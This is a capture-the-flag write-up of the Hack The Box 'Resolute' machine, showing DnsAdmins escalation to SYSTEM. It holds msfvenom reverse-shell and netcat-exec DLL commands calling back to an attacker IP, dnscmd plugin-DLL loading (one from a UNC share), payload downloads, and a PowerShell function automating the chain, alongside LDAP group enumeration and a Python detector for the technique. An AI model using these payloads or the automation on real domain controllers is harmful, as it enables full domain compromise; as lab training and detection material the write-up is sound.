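The gap between net user and whoami /all is worth being able to close from the directory itself, without RSAT. The block below is an added example, not part of the original notes: it asks the DC for every group a user is in transitively, using the LDAP_MATCHING_RULE_IN_CHAIN matching rule, and marks which memberships are direct. It assumes a domain-joined host with an LDAP-reachable DC and a caller that can read group objects (any domain user can); the function name and output shape are this example's own.

```powershell
# Added example, not from the original notes: resolve a user's effective group
# membership straight from LDAP, including groups reached through nesting.
# Domain Users will not appear: it is the primary group, held in primaryGroupID
# rather than member/memberOf, so the matching rule never sees it.

function Get-EffectiveGroups {
    param([Parameter(Mandatory)][string] $SamAccountName)

    # Locate the user; the default search root is the logon domain.
    $userSearch = [ADSISearcher]"(&(objectCategory=person)(sAMAccountName=$SamAccountName))"
    [void]$userSearch.PropertiesToLoad.AddRange([string[]]@('distinguishedname', 'memberof'))
    $user = $userSearch.FindOne()
    if (-not $user) { throw "user '$SamAccountName' not found" }
    $dn     = [string]$user.Properties['distinguishedname'][0]
    $direct = @($user.Properties['memberof'] | ForEach-Object { [string]$_ })

    # A DN used inside an LDAP filter must have filter metacharacters escaped.
    $escaped = $dn -replace '\\', '\5c' -replace '\(', '\28' -replace '\)', '\29' -replace '\*', '\2a'

    # LDAP_MATCHING_RULE_IN_CHAIN (OID 1.2.840.113556.1.4.1941) makes the DC walk
    # member-of-member chains server side: one query, every transitive group.
    $groupSearch = [ADSISearcher]"(member:1.2.840.113556.1.4.1941:=$escaped)"
    $groupSearch.PageSize = 500
    [void]$groupSearch.PropertiesToLoad.AddRange([string[]]@('samaccountname', 'grouptype', 'distinguishedname'))

    foreach ($g in $groupSearch.FindAll()) {
        $type  = [int64]$g.Properties['grouptype'][0]    # signed 32-bit flag set in AD
        $scope = 'Unknown'
        if ($type -band 0x2) { $scope = 'Global' } elseif ($type -band 0x4) { $scope = 'DomainLocal' } elseif ($type -band 0x8) { $scope = 'Universal' }
        [pscustomobject]@{
            Group    = [string]$g.Properties['samaccountname'][0]
            Scope    = $scope
            Security = [bool]($type -band 0x80000000)   # security vs distribution group
            Direct   = $direct -contains [string]$g.Properties['distinguishedname'][0]
        }
    }
}

# For ryan, Contractors should come back Direct=True and DnsAdmins Direct=False,
# matching the difference between the net user and whoami /all output above.
Get-EffectiveGroups -SamAccountName ryan | Sort-Object Direct -Descending | Format-Table -AutoSize
```

Run this for any low-privileged foothold account before reaching for BloodHound: a single nested membership in DnsAdmins, Backup Operators or Server Operators is a complete escalation path on a DC, and it is invisible to net user.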

DnsAdmins privilege escalation. Members of DnsAdmins may set the DNS server's ServerLevelPluginDll value (under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters) through dnscmd, and the DNS service, which runs as SYSTEM on the DC, loads that DLL the next time it starts. The steps:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Your_IP> LPORT=<Your_Port> -f dll > malicious.dll

Upload the DLL to a path the DNS service can read (it runs as LocalSystem, so a user profile directory is fine).

Run the following command to reconfigure the DNS server (use . for the local server):

dnscmd <ServerName> /config /serverlevelplugindll <Path_to_malicious_DLL>

Restart the DNS service:
net stop "DNS Server"
net start "DNS Server"

Two caveats. DnsAdmins membership does not by itself include the right to stop and start the service; that is governed by the service's own ACL, so the restart step may need a different route. And the dnscmd step itself runs fine over evil-winrm (see below); where this procedure goes wrong is getting a valid DLL onto the box and restarting the service. Once you have SYSTEM, clear ServerLevelPluginDll again, otherwise the DC keeps loading the DLL on every DNS start.
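The whole procedure, with the checks that would have saved time on this box, as an added example rather than anything from the original notes. It assumes the DLL is already on disk at $DllPath, that the session belongs to a DnsAdmins member who can stop and start the DNS service (ryan could, via sc.exe), and that the reverse-shell listener is up. The function names are this example's own. It uses sc.exe rather than Restart-Service on purpose: Restart-Service also enumerates the service's dependents, which this user cannot query, while sc.exe stop/start addresses the DNS service alone.

```powershell
# Added example, not from the original notes: DnsAdmins plugin-DLL load with
# pre-flight checks, registry read-back, a direct sc.exe restart, and cleanup.

function Invoke-DnsServerPluginLoad {
    param(
        [Parameter(Mandatory)] [string] $DllPath,
        [int] $TimeoutSeconds = 30
    )
    $regKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

    # 1. Every DLL pushed through evil-winrm above arrived as 0 bytes. Refuse to
    #    bounce a DC's DNS service for a file that cannot possibly load.
    $file = Get-Item -LiteralPath $DllPath -ErrorAction Stop
    if ($file.Length -eq 0) { throw "$DllPath is empty; re-transfer it (e.g. Invoke-WebRequest) before continuing" }

    # 2. Confirm DnsAdmins is actually in the current token (what whoami /all shows).
    $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $groups   = @($identity.Groups | ForEach-Object {
        try { $_.Translate([System.Security.Principal.NTAccount]).Value } catch { $_.Value }
    })
    if (-not ($groups -match '\\DnsAdmins$')) { throw "token for $($identity.Name) is not a DnsAdmins member" }

    # 3. Point the server at the plugin. '.' is the local DNS server; the path
    #    must be readable by LocalSystem, which a profile directory is.
    $out = & dnscmd.exe . /config /serverlevelplugindll $DllPath 2>&1
    if ($LASTEXITCODE -ne 0) { throw "dnscmd failed: $out" }

    # 4. Read the value back. Assumption: the DNS Parameters key is readable by
    #    ordinary users on this DC; if this errors, skip the check, not the restart.
    $set = (Get-ItemProperty -Path $regKey -Name ServerLevelPluginDll -ErrorAction Stop).ServerLevelPluginDll
    if ($set -ne $DllPath) { throw "ServerLevelPluginDll reads '$set', expected '$DllPath'" }

    # 5. Restart DNS directly. The DLL is loaded during service start, so have
    #    the listener running before this line.
    & sc.exe stop dns | Out-Null
    $svc = Get-Service -Name DNS
    $svc.WaitForStatus('Stopped', [TimeSpan]::FromSeconds($TimeoutSeconds))
    & sc.exe start dns | Out-Null
    $svc.Refresh()
    return $svc.Status
}

# Cleanup, to be run from the SYSTEM shell once you have it: a DC that keeps
# loading an attacker DLL on every DNS start is not something to leave behind.
function Remove-DnsServerPlugin {
    $regKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
    Remove-ItemProperty -Path $regKey -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
    & sc.exe stop dns | Out-Null
    (Get-Service -Name DNS).WaitForStatus('Stopped', [TimeSpan]::FromSeconds(30))
    & sc.exe start dns | Out-Null
}

Invoke-DnsServerPluginLoad -DllPath 'C:\Users\ryan\Documents\malicious2.dll'
```

Step 4 is the one most often skipped: dnscmd prints "successfully reset" whether or not the file exists, so reading the value back, together with the size check in step 1, is the only confirmation that the service will be handed a loadable DLL.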


steps

┌──(kali㉿kali)-[~/HTB/resolute]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=444 -f dll > malicious.dll 

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ nc -nlvp 444       
listening on [any] 444 ...



on the target

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious.dll 

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> 

Tried to restart DNS but it failed due to permissions

*Evil-WinRM* PS C:\Users\ryan\Documents> Restart-Service -Name 'DNS Server'
'Cannot access dependent services of 'DNS Server (DNS)'
At line:1 char:1
+ Restart-Service -Name 'DNS Server'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (System.ServiceProcess.ServiceController:ServiceController) [Restart-Service], ServiceCommandException
    + FullyQualifiedErrorId : CouldNotAccessDependentServices,Microsoft.PowerShell.Commands.RestartServiceCommand
Service 'DNS Server (DNS)' cannot be stopped due to the following error: Cannot open DNS service on computer '.'.
At line:1 char:1
+ Restart-Service -Name 'DNS Server'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : CloseError: (System.ServiceProcess.ServiceController:ServiceController) [Restart-Service], ServiceCommandException
    + FullyQualifiedErrorId : CouldNotStopService,Microsoft.PowerShell.Commands.RestartServiceCommand
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious.dll

Read that this may be an issue with evil-winrm. Will try a reverse shell so I can run it from my machine.

setting up and running the reverse shell

└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]

Warning: Press "y" to exit, press any other key to continue
*Evil-WinRM* PS C:\Users\ryan\Documents> upload /home/kali/HTB/resolute/shell.exe
                                        
Info: Uploading /home/kali/HTB/resolute/shell.exe to C:\Users\ryan\Documents\shell.exe
                                        
Data: 9556 bytes of 9556 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\ryan\Documents> ./shell.exe

exe failed

*Evil-WinRM* PS C:\Users\ryan\Documents> ./shell.exe
Program 'shell.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1
+ ./shell.exe
+ ~~~~~~~~~~~.
At line:1 char:1
+ ./shell.exe
+ ~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\Users\ryan\Documents> upload /home/kali/HTB/resolute/shell2.exe

will try dll but kept failing

Info: Upload successful!
*Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe shell_x64.dll
*Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe path\to\shell_x64.dll,DllMain
*Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe shell_x64.dll,DllMain
*Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe ./shell_x64.dll,DllMain
*Evil-WinRM* PS C:\Users\ryan\Documents> pwd

Path
----
C:\Users\ryan\Documents


*Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe C:\Users\ryan\Documents\shell_x64.dll,DllMain
*Evil-WinRM* PS C:\Users\ryan\Documents> 

I found a way to restart DNS via sc.exe

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious.dll 

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x1
        WAIT_HINT          : 0x7530
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x1
        WAIT_HINT          : 0x4e20
        PID                : 3308
        FLAGS              :
*Evil-WinRM* PS C:\Users\ryan\Documents> 

After research, found that the DLL we created will not work and we need to create one with the windows/x64/exec module.

1. Use the windows/x64/exec payload with the CMD option to run the desired command when the DLL is loaded. For a reverse shell, run something like nc.exe (netcat).

2. The following command generates a DLL that, when loaded, executes the specified command (here a reverse shell via netcat):

msfvenom -p windows/x64/exec CMD="C:\path\to\nc.exe 10.10.14.20 444 -e cmd.exe" -f dll > malicious.dll

msfvenom -p windows/x64/exec CMD="C:\\path\\to\\nc.exe 10.10.14.20 444 -e cmd.exe" -f dll > malicious2.dll

Both spellings give the same CMD string: inside bash double quotes a backslash is kept unless it precedes $, `, ", \ or a newline, so \p stays \p and \\ collapses to \, and the Windows side sees a single backslash either way.

copying and uploading nc.exe

┌──(kali㉿kali)-[~/HTB/resolute]
└─$ locate nc.exe          
/usr/share/windows-resources/binaries/nc.exe
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ cp /usr/share/windows-resources/binaries/nc.exe ~/HTB/resolute
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ 

*Evil-WinRM* PS C:\Users\ryan\Documents> upload /home/kali/HTB/resolute/nc.exe
                                        
Info: Uploading /home/kali/HTB/resolute/nc.exe to C:\Users\ryan\Documents\nc.exe
                                        
Data: 79188 bytes of 79188 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\ryan\Documents> 

msfvenom

┌──(kali㉿kali)-[~/HTB/resolute]
└─$ msfvenom -p windows/x64/exec CMD="C:\\Users\\ryan\\Documents\\nc.exe 10.10.14.20 444 -e cmd.exe" -f dll > malicious2.dll                                                   

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 325 bytes
Final size of dll file: 9216 bytes

                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ 

load the dll using the dns service

dnscmd.exe /config /serverlevelplugindll C:\Users\ryan\Documents\malicious2.dll

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll C:\Users\ryan\Documents\malicious2.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> 

Ran it and this failed. Realised all the DLL and EXE uploads are 0 bytes, but other files upload fine.

*Evil-WinRM* PS C:\Users\ryan\Documents> ls 


    Directory: C:\Users\ryan\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/16/2023   9:48 AM              0 malicious.dll
-a----        9/16/2023  10:46 AM              0 malicious2.dll
-a----        9/16/2023  10:42 AM          59392 nc.exe
-a----        9/16/2023  10:05 AM              0 pwned.dll
-a----        9/16/2023  10:56 AM            959 resolute.gnmap
-a----        9/16/2023  10:12 AM              0 shell.exe
-a----        9/16/2023  10:14 AM          53624 shell2.exe
-a----        9/16/2023  10:19 AM              0 shell_x64.dll

Will rename the DLL to .txt and upload the renamed file (malicious2.txt), but it is still showing zero bytes.

*Evil-WinRM* PS C:\Users\ryan\Documents> ls


    Directory: C:\Users\ryan\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/16/2023   9:48 AM              0 malicious.dll
-a----        9/16/2023  10:46 AM              0 malicious2.dll
-a----        9/16/2023  10:59 AM              0 malicious2.txt
-a----        9/16/2023  10:42 AM          59392 nc.exe
-a----        9/16/2023  10:05 AM              0 pwned.dll
-a----        9/16/2023  10:56 AM            959 resolute.gnmap
-a----        9/16/2023  10:12 AM              0 shell.exe
-a----        9/16/2023  10:14 AM          53624 shell2.exe
-a----        9/16/2023  10:19 AM              0 shell_x64.dll

We try a different method to upload the file, i.e. PowerShell: invoke-WebRequest -Uri http://10.10.14.20:8000/malicious6.dll -OutFile malicious6.dll -UseBasicParsing

kali

┌──(kali㉿kali)-[~/HTB/resolute]
└─$ python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.169 - - [16/Sep/2023 14:06:14] "GET /malicious6.dll HTTP/1.1" 200 -

host machine

*Evil-WinRM* PS C:\Users\ryan\Documents> invoke-WebRequest -Uri http://10.10.14.20:8000/malicious6.dll -OutFile malicious6.dll -UseBasicParsing
*Evil-WinRM* PS C:\Users\ryan\Documents> ls


    Directory: C:\Users\ryan\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/16/2023  11:02 AM              0 again.txt
-a----        9/16/2023   9:48 AM              0 malicious.dll
-a----        9/16/2023  10:46 AM              0 malicious2.dll
-a----        9/16/2023  10:59 AM              0 malicious2.txt
-a----        9/16/2023  11:15 AM           9216 malicious6.dll
-a----        9/16/2023  10:42 AM          59392 nc.exe
-a----        9/16/2023  10:05 AM              0 pwned.dll
-a----        9/16/2023  10:56 AM            959 resolute.gnmap
-a----        9/16/2023  10:12 AM              0 shell.exe
-a----        9/16/2023  10:14 AM          53624 shell2.exe
-a----        9/16/2023  10:19 AM              0 shell_x64.dll
-a----        9/16/2023  11:00 AM              0 tt.txt

load into dns -- dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious6.dll

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious6.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> 

Reverse shell fails again. Will try with the 64-bit version of nc.exe I found here: https://github.com/int0x33/nc.exe/

*Evil-WinRM* PS C:\Users\ryan\Documents> invoke-WebRequest -Uri http://10.10.14.20:8000/nc64.exe -OutFile nc64.exe -UseBasicParsing
*Evil-WinRM* PS C:\Users\ryan\Documents> invoke-WebRequest -Uri http://10.10.14.20:8000/dnshack.dll -OutFile dnshack.dll -UseBasicParsing
*Evil-WinRM* PS C:\Users\ryan\Documents> ls


    Directory: C:\Users\ryan\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/16/2023  11:02 AM              0 again.txt
-a----        9/16/2023  11:26 AM           9216 dnshack.dll
-a----        9/16/2023   9:48 AM              0 malicious.dll
-a----        9/16/2023  10:46 AM              0 malicious2.dll
-a----        9/16/2023  10:59 AM              0 malicious2.txt
-a----        9/16/2023  10:42 AM          59392 nc.exe
-a----        9/16/2023  11:25 AM          45272 nc64.exe
-a----        9/16/2023  10:05 AM              0 pwned.dll
-a----        9/16/2023  10:56 AM            959 resolute.gnmap
-a----        9/16/2023  10:12 AM              0 shell.exe
-a----        9/16/2023  10:14 AM          53624 shell2.exe
-a----        9/16/2023  10:19 AM              0 shell_x64.dll
-a----        9/16/2023  11:00 AM              0 tt.txt


*Evil-WinRM* PS C:\Users\ryan\Documents> 

kali msfvenom

└─$ msfvenom -p windows/x64/exec CMD="C:\\Users\\ryan\\Documents\\nc64.exe 10.10.14.20 444 -e cmd.exe" -f dll > dnshack.dll

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 327 bytes
Final size of dll file: 9216 bytes

Load and try again, but it fails.

We will try meterpreter payload

m -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=444 -f dll > final.dll
[sudo] password for kali: 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
                                                                                                                     

Upload, load and verify:

*Evil-WinRM* PS C:\Users\ryan\Documents> invoke-WebRequest -Uri http://10.10.14.20:8000/final.dll -OutFile final.dll -UseBasicParsing
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe 10.10.10.169 /config /serverlevelplugindll C:\Users\ryan\Documents\final.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll


ServerLevelPluginDll : C:\Users\ryan\Documents\final.dll
PSPath               : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\
PSParentPath         : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS
PSChildName          : Parameters
PSDrive              : HKLM
PSProvider           : Microsoft.PowerShell.Core\Registry



*Evil-WinRM* PS C:\Users\ryan\Documents> 

Stop and start DNS while trying to catch the shell on Kali:

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x1
        WAIT_HINT          : 0x7530
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe query dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 3504
        FLAGS              :
*Evil-WinRM* PS C:\Users\ryan\Documents> 

Will try multi/handler instead of nc.

Kept failing.

Restarted the machine and trying again.

msfvenom

└─$ sudo msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f dll > reboot.dll
[sudo] password for kali: 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes

Download the DLL to the PC:

*Evil-WinRM* PS C:\Users\ryan\Documents> Invoke-WebRequest -Uri http://10.10.14.20:8000/resolute.dll -OutFile resolute.dll -UseBasicParsing
*Evil-WinRM* PS C:\Users\ryan\Documents> ls


    Directory: C:\Users\ryan\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/17/2023   3:17 AM           9216 reboot.dll


*Evil-WinRM* PS C:\Users\ryan\Documents> 


After a lot of mucking around I gave up on the Evil-WinRM method of loading the DLL

from the Evil-WinRM prompt.

New DLL:

└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=4444 --platform=windows -f dll > resolute.dll
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
                                                                                      

Will serve it using smbserver.py:

└─$ python3 ./smbserver.py share /home/kali/HTB/resolute/
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,52573)
[*] AUTHENTICATE_MESSAGE (\,RESOLUTE)


Load into DNS from the SMB share -- dnscmd resolute.megabank.local /config /serverlevelplugindll \\10.10.14.20\share\resolute.dll

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd resolute.megabank.local /config /serverlevelplugindll \\10.10.14.20\share\resolute.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.stop dns
The term 'sc.stop' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ sc.stop dns
+ ~~~~~~~
    + CategoryInfo          : ObjectNotFound: (sc.stop:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 804
        FLAGS              :
*Evil-WinRM* PS C:\Users\ryan\Documents> 
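The chain above (dnscmd writing ServerLevelPluginDll, the DNS service loading a DLL from a UNC share as SYSTEM, then sc.exe stop/start dns) leaves telemetry a blue team can key on. The following Python is an added example, not part of this writeup, that runs a simple detection over constructed Sysmon-style events: process-creation records (Event ID 1) for dnscmd.exe and sc.exe, and a registry-value-set record (Event ID 13) for the ServerLevelPluginDll value. The event dictionaries, usernames and timestamps are made up for the example; the assumption that the registry write shows up under dns.exe as SYSTEM (because dnscmd asks the DNS server over RPC rather than writing HKLM itself) is mine, and the field names are a simplification of the real Sysmon schema.

```python
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (not captured from the box), shaped after
# Sysmon Event ID 1 (process create) and Event ID 13 (registry value set).
# Assumption: the registry write is attributed to dns.exe running as SYSTEM,
# because dnscmd asks the DNS server over RPC to change the setting rather
# than writing HKLM itself.
SAMPLE_EVENTS = [
    {"time": "2023-09-17T07:50:00", "id": 1, "user": "MEGABANK\\dnsops",
     "image": "C:\\Windows\\System32\\dnscmd.exe", "cmd": "dnscmd /enumzones"},
    {"time": "2023-09-17T08:05:01", "id": 1, "user": "MEGABANK\\ryan",
     "image": "C:\\Windows\\System32\\dnscmd.exe",
     "cmd": "dnscmd resolute.megabank.local /config /serverlevelplugindll "
            "\\\\10.10.14.20\\share\\resolute.dll"},
    {"time": "2023-09-17T08:05:01", "id": 13, "user": "NT AUTHORITY\\SYSTEM",
     "image": "C:\\Windows\\System32\\dns.exe",
     "target": "HKLM\\System\\CurrentControlSet\\Services\\DNS\\Parameters\\ServerLevelPluginDll",
     "details": "\\\\10.10.14.20\\share\\resolute.dll"},
    {"time": "2023-09-17T08:05:20", "id": 1, "user": "MEGABANK\\ryan",
     "image": "C:\\Windows\\System32\\sc.exe", "cmd": "sc.exe stop dns"},
    {"time": "2023-09-17T08:05:31", "id": 1, "user": "MEGABANK\\ryan",
     "image": "C:\\Windows\\System32\\sc.exe", "cmd": "sc.exe start dns"},
]

PLUGIN_VALUE = "serverlevelplugindll"
# Captures the DLL path handed to dnscmd; clearing the value (no path) does not match.
DNSCMD_RE = re.compile(r"/serverlevelplugindll\s+(\S+)", re.IGNORECASE)
DNS_RESTART_RE = re.compile(r"\b(stop|start|restart)\s+dns\b", re.IGNORECASE)
SERVICE_TOOLS = ("sc.exe", "net.exe", "net1.exe")


def _basename(image):
    return image.lower().rsplit("\\", 1)[-1]


def plugin_dll_path(event):
    """Return the DLL path an event sets as the DNS plugin, or None if unrelated."""
    if event["id"] == 1 and _basename(event["image"]) == "dnscmd.exe":
        m = DNSCMD_RE.search(event.get("cmd", ""))
        return m.group(1) if m else None
    if event["id"] == 13 and event["target"].lower().endswith("\\" + PLUGIN_VALUE):
        return event.get("details") or None
    return None


def is_remote_path(path):
    """A UNC path means the DNS service (SYSTEM) will load code from a share it does not control."""
    return path.startswith("\\\\")


def is_dns_restart(event):
    """Process-create events that stop/start the DNS service, which is what makes the DLL load."""
    return (event["id"] == 1
            and _basename(event["image"]) in SERVICE_TOOLS
            and DNS_RESTART_RE.search(event.get("cmd", "")) is not None)


def detect(events, window=timedelta(minutes=10)):
    """Flag every plugin-DLL change; escalate when the path is remote or a DNS restart follows."""
    findings = []
    ordered = sorted(events, key=lambda e: datetime.fromisoformat(e["time"]))
    for i, ev in enumerate(ordered):
        path = plugin_dll_path(ev)
        if path is None:
            continue
        t = datetime.fromisoformat(ev["time"])
        restarted = any(
            is_dns_restart(later) and datetime.fromisoformat(later["time"]) - t <= window
            for later in ordered[i + 1:])
        remote = is_remote_path(path)
        findings.append({
            "time": ev["time"], "event_id": ev["id"], "user": ev["user"], "dll": path,
            "remote": remote, "restart_followed": restarted,
            "severity": "critical" if (remote or restarted) else "high",
        })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Keying on both the dnscmd command line and the registry value matters: the command-line rule misses a client that talks to the DNS RPC interface directly, while the registry rule misses nothing that actually changes the setting. For a one-off audit of a server, the Get-ItemProperty command shown earlier on this page reads the current value; a value that is set at all on a server with no known plugin, and especially one pointing at a UNC path, should be removed and DnsAdmins membership reviewed.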


metasploit listener

msf6 > use exploit/windows/x64/shell_reverse_tcp
[-] No results from search
[-] Failed to load module: exploit/windows/x64/shell_reverse_tcp
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > use exploit/windows/x64/shell_reverse_tcp
[-] No results from search
[-] Failed to load module: exploit/windows/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload exploit/windows/x64/shell_reverse_tcp
[-] The value specified for payload is not valid.
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp
PAYLOAD => windows/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.20
LHOST => 10.10.14.20
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > Interrupt: use the 'exit' command to quit
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/shell_reverse_tcp):

